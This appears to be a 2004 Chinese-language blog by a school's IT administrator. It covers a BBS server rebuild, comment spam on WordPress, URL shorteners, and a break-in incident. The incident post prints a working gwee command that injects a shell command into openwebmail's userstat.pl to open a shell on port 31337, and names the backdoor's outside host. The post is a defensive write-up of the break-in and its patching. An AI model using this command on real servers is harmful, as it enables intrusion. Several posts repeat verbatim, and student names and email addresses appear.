BBS 現在已經是整台全新的機器,跟電腦教室用的一樣。
硬碟也換掉了,SCSI 卡也換掉了。最不可能壞掉的 SCSI 排線也換掉了。沒有一樣是舊的。
但還是抓不到硬碟。很傷腦筋,修電腦最怕的就是同時壞兩樣東西。全換新的之後還是有東西是壞的,那就很難檢查。
所以 BBS 復站又要再等了。
2004年10月31日 星期日
2004年10月28日 星期四
有人報名參加 BBS 維護
高一心 陳明軒 nice_cookie_2000.AT.yahoo.com.tw
高一齊 李長益 q35120.AT.yahoo.com.tw
這兩位同學,還有一位高二同學,我忘了留下姓名。大家很熱心想要參與 BBS 的維護。
不過目前比較麻煩的是,訓練的時間很長,等訓練完,應該也早就修好了吧。
所以可能要在 BBS 修復之後,才開始訓練。重點是 FreeBSD 系統的管理。
高一齊 李長益 q35120.AT.yahoo.com.tw
這兩位同學,還有一位高二同學,我忘了留下姓名。大家很熱心想要參與 BBS 的維護。
不過目前比較麻煩的是,訓練的時間很長,等訓練完,應該也早就修好了吧。
所以可能要在 BBS 修復之後,才開始訓練。重點是 FreeBSD 系統的管理。
2004年10月27日 星期三
2004年10月25日 星期一
莫非定律
這真的是莫非定律。
總是殷殷勸諫他人應時常備份自己的資料,我自己卻沒有這樣做,於是今天我的硬碟死掉之後,我進正心這幾年來所有的文件及數位照片全數消失。辦公用的電腦也暫時沒辦法運作了。
既然自己的電腦不能用了,只好多花一點功夫來弄 BBS,BBS 似乎被下了惡咒,整個安裝過程中一直非常不順利,老是狀況百出。比如說,我拿了一片新的空白光碟,燒了 FreeBSD 4.10 Release 的安裝片,安裝到後來老是在某個地方失敗,看起來是硬碟 slice 分割有點問題,所以在做完 newfs 這個動作,開始把東西放進硬碟中時,就出現各種錯誤訊息。
後來才發現是安裝光碟片有問題。從七月多維修 BBS 到現在,沒有一個零件是完美無缺的運轉,不是那裡出問題就是這裡出問題。這次新電腦終於來了,從頭到腳沒有一樣不是新的,就連放著舊資料的也是之前剛換過的新硬碟。但還是裝不起來,有一兩個同學看到學校首頁我的徵求站長公告,來找我看能不能幫忙,但很可惜我知道他們幫不上忙,只好又打發他們走了,但還是非常謝謝你們!
目前系統暫時是起來了,但存放 BBS 舊資料的 SCSI 硬碟卻抓不到(應該說曾經抓到過,然後就消失了)。現在又暫時沒輒了,我最近運氣真的不太好,還是少摸點電腦好了。
總是殷殷勸諫他人應時常備份自己的資料,我自己卻沒有這樣做,於是今天我的硬碟死掉之後,我進正心這幾年來所有的文件及數位照片全數消失。辦公用的電腦也暫時沒辦法運作了。
既然自己的電腦不能用了,只好多花一點功夫來弄 BBS,BBS 似乎被下了惡咒,整個安裝過程中一直非常不順利,老是狀況百出。比如說,我拿了一片新的空白光碟,燒了 FreeBSD 4.10 Release 的安裝片,安裝到後來老是在某個地方失敗,看起來是硬碟 slice 分割有點問題,所以在做完 newfs 這個動作,開始把東西放進硬碟中時,就出現各種錯誤訊息。
後來才發現是安裝光碟片有問題。從七月多維修 BBS 到現在,沒有一個零件是完美無缺的運轉,不是那裡出問題就是這裡出問題。這次新電腦終於來了,從頭到腳沒有一樣不是新的,就連放著舊資料的也是之前剛換過的新硬碟。但還是裝不起來,有一兩個同學看到學校首頁我的徵求站長公告,來找我看能不能幫忙,但很可惜我知道他們幫不上忙,只好又打發他們走了,但還是非常謝謝你們!
目前系統暫時是起來了,但存放 BBS 舊資料的 SCSI 硬碟卻抓不到(應該說曾經抓到過,然後就消失了)。現在又暫時沒輒了,我最近運氣真的不太好,還是少摸點電腦好了。
2004年10月24日 星期日
WordPress 防廣告留言
今天晚上我一上這裡,就發現這個地方被塞了快一百篇的廣告留言(comment spam)。
這種廣告商很討厭,它會利用搜尋引擎自動找出安裝 WordPress 的網站,然後用機器人程式自動在網站上留言,目的是為了提高他們網站的曝光率(比如說 Google 上的排名往前移)。
反制的方法也有不少人在討論,比如說這個 Word Press Blacklist Comment Spam Plugin,或是 How to combat comment spam with WordPress。
但我覺得這些方法都很麻煩,反正機器人看不懂人類的圖片,就讓留言者每次留言時,都要輸入經過「人類測試」,要看一張圖片,確定圖片中的字母,依序輸入。
其實這個方法我早在本校網站首頁上就已經在使用了,比如說這個管理者登入網址。
我在這裡找到了有相同想法的人寫的程式:WordPress Hack: AuthImage,我已經把這個程式用在這個網站了,所以各位如果要留言的話,必須輸入圖片中的字母喔~
其實這個程式寫得不夠好,因為他要改不少東西,如果可以做成 plug-in,隨插即用就更好了。
這種廣告商很討厭,它會利用搜尋引擎自動找出安裝 WordPress 的網站,然後用機器人程式自動在網站上留言,目的是為了提高他們網站的曝光率(比如說 Google 上的排名往前移)。
反制的方法也有不少人在討論,比如說這個 Word Press Blacklist Comment Spam Plugin,或是 How to combat comment spam with WordPress。
但我覺得這些方法都很麻煩,反正機器人看不懂人類的圖片,就讓留言者每次留言時,都要輸入經過「人類測試」,要看一張圖片,確定圖片中的字母,依序輸入。
其實這個方法我早在本校網站首頁上就已經在使用了,比如說這個管理者登入網址。
我在這裡找到了有相同想法的人寫的程式:WordPress Hack: AuthImage,我已經把這個程式用在這個網站了,所以各位如果要留言的話,必須輸入圖片中的字母喔~
其實這個程式寫得不夠好,因為他要改不少東西,如果可以做成 plug-in,隨插即用就更好了。
產生短網址
剛剛幫本站弄了一個簡短網址:http://0rz.net/ba00f
這其實只是轉址的功能,很簡單。
你可以在這個網站:http://0rz.net,輸入一個長的網址,它就會丟一個短的網址給你。
這有什麼好處呢? 當你轉貼這些連結的時候,可以不會超出一頁的範圍,比如說在 bbs 裡面就特別好用。不用叫使用者還得自動把被斷行的網址接起來。
除了上述提供的網站,國外還有另一個提供相同功能的網站:http://tinyurl.com/。
更有趣的是,竟然也有人提供把網址變長的服務:http://www.hugeurl.com/。
這其實只是轉址的功能,很簡單。
你可以在這個網站:http://0rz.net,輸入一個長的網址,它就會丟一個短的網址給你。
這有什麼好處呢? 當你轉貼這些連結的時候,可以不會超出一頁的範圍,比如說在 bbs 裡面就特別好用。不用叫使用者還得自動把被斷行的網址接起來。
除了上述提供的網站,國外還有另一個提供相同功能的網站:http://tinyurl.com/。
更有趣的是,竟然也有人提供把網址變長的服務:http://www.hugeurl.com/。
2004年10月21日 星期四
駭客入侵事件簿1
目前大概已經整理出駭客入侵的路線了。
我一開始是看到 www 這個使用者,一直有在執行 crontab,它會不斷的去呼叫 /var/spool/uucppublic/sh。
這顯然是一個後門程式,所謂的後門就是駭客入侵之後,為了避免當時用來入侵的漏洞被修補起來,所以打開的一道後門,供日後方便進出該機器。
[[MORE]]
我使用 lsof 去觀察這個檔案,及其開啟的檔案或者網路 port,發現它會連到這個地方:
ccadam.com:6665
因為最近很忙,所以一直沒有去注意最近被發表的漏洞,只知道駭客是利用網頁的服務進來的,可是本校的網頁實在太多,到底哪一隻程式出問題,其實也不曉得。只好先隨便猜測,然後找看看有沒有對應的 advisory。還好,沒有花太多時間就鎖定了一隻有漏洞的程式:openwebmail,也就是我們的網路郵局。
根據 Hackwire上的資料,有一個不錯的 exploit 工具:Gwee,可以幫助我去驗證這個漏洞。
gwee (Generic Web Exploitation Engine) is a small program written in C designed to exploit input validation vulnerabilities in web scripts, such as Perl CGIs, PHP, etc. gwee is much like an exploit, except more general-purpose.
要入侵具有漏洞的 openwebmail 系統,只需要下這個指令:
該程式會在 localhost 去 listen 31337 這個 port,然後傳回一個受害端的 shell,這個 shell 是以 www 的身份在執行的。
由於學生郵局有較嚴格的防火牆設定,所以這個工具沒辦法生效。(雖然還是有機會繞過防火牆來執行 exploit)但首頁用的主機我為了提供更高的效能,所以沒有架防火牆,因此成為目標。
現在已經將 openwebmail 都更新到最新版了。有漏洞的版本包括 OpenWebmail 2.20+ (2.20, 2.21, 2.30 confirmed) 。
駭客如果要找受害者,真的容易到了極點,不講太明了。
我一開始是看到 www 這個使用者,一直有在執行 crontab,它會不斷的去呼叫 /var/spool/uucppublic/sh。
這顯然是一個後門程式,所謂的後門就是駭客入侵之後,為了避免當時用來入侵的漏洞被修補起來,所以打開的一道後門,供日後方便進出該機器。
[[MORE]]
我使用 lsof 去觀察這個檔案,及其開啟的檔案或者網路 port,發現它會連到這個地方:
ccadam.com:6665
因為最近很忙,所以一直沒有去注意最近被發表的漏洞,只知道駭客是利用網頁的服務進來的,可是本校的網頁實在太多,到底哪一隻程式出問題,其實也不曉得。只好先隨便猜測,然後找看看有沒有對應的 advisory。還好,沒有花太多時間就鎖定了一隻有漏洞的程式:openwebmail,也就是我們的網路郵局。
根據 Hackwire上的資料,有一個不錯的 exploit 工具:Gwee,可以幫助我去驗證這個漏洞。
gwee (Generic Web Exploitation Engine) is a small program written in C designed to exploit input validation vulnerabilities in web scripts, such as Perl CGIs, PHP, etc. gwee is much like an exploit, except more general-purpose.
要入侵具有漏洞的 openwebmail 系統,只需要下這個指令:
gwee -L -y'loginname=%3B' -llocalhost -p31337 http://target/cgi-bin/openwebmail/userstat.pl該程式會在 localhost 去 listen 31337 這個 port,然後傳回一個受害端的 shell,這個 shell 是以 www 的身份在執行的。
由於學生郵局有較嚴格的防火牆設定,所以這個工具沒辦法生效。(雖然還是有機會繞過防火牆來執行 exploit)但首頁用的主機我為了提供更高的效能,所以沒有架防火牆,因此成為目標。
現在已經將 openwebmail 都更新到最新版了。有漏洞的版本包括 OpenWebmail 2.20+ (2.20, 2.21, 2.30 confirmed) 。
駭客如果要找受害者,真的容易到了極點,不講太明了。
訂閱:
文章 (Atom)